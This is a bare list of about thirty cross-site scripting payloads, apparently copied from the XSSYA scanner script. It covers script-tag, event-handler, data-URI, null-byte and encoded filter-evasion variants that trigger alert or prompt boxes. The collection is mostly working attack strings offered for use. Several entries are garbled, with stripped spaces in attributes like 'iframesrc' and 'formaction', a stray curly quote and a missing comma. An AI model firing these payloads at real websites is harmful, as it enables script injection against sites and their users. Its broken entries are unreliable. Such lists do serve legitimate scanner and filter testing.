xss payload
1.代码来自xssya.py
http://packetstorm.interhost.co.il/UNIX/scanners/XSSYA-master.zip
"%22%3Cscript%3Ealert%28%27XSSYA%27%29%3C%2Fscript%3E",
"1%253CScRiPt%2520%253Eprompt%28962477%29%253C%2fsCripT%253E",
"<script>alert('xssya')</script>",
"'';!--\"<XSS>=&{()}",
"%3CScRipt%3EALeRt(%27xssya%27)%3B%3C%2FsCRipT%3E"
"<scr<script>ipt>alert(1)</scr<script>ipt>",
"%3cscript%3ealert(%27XSSYA%27)%3c%2fscript%3e",
"%3cbody%2fonhashchange%3dalert(1)%3e%3ca+href%3d%23%3eclickit",
"%3cimg+src%3dx+onerror%3dprompt(1)%3b%3e%0d%0a",
"%3cvideo+src%3dx+onerror%3dprompt(1)%3b%3e",
"<iframesrc=\"javascript:alert(2)\">",
"<iframe/src=\"data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">",
"<formaction=\"Javascript:alert(1)\"><inputtype=submit>",
"<isindexaction=data:text/html,type=image>",
"<objectdata=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=\">",
"<svg/onload=prompt(1);>",
"<marquee/onstart=confirm(2)>/",
"<bodyonload=prompt(1);>",
"<q/oncut=open()>",
"<aonmouseover=location=’javascript:alert(1)>click",
"<svg><script>alert(/1/)</script>",
"</script><script>alert(1)</script>",
"<scri%00pt>alert(1);</scri%00pt>",
"<scri%00pt>confirm(0);</scri%00pt>",
"5\x72\x74\x28\x30\x29\x3B'>rhainfosec",
"<isindexaction=j	a	vas	c	r	ipt:alert(1)type=image>",
"<marquee/onstart=confirm(2)>",
"<AHREF=\"http://www.google.com./\">XSS</A>",
"<svg/onload=prompt(1);>"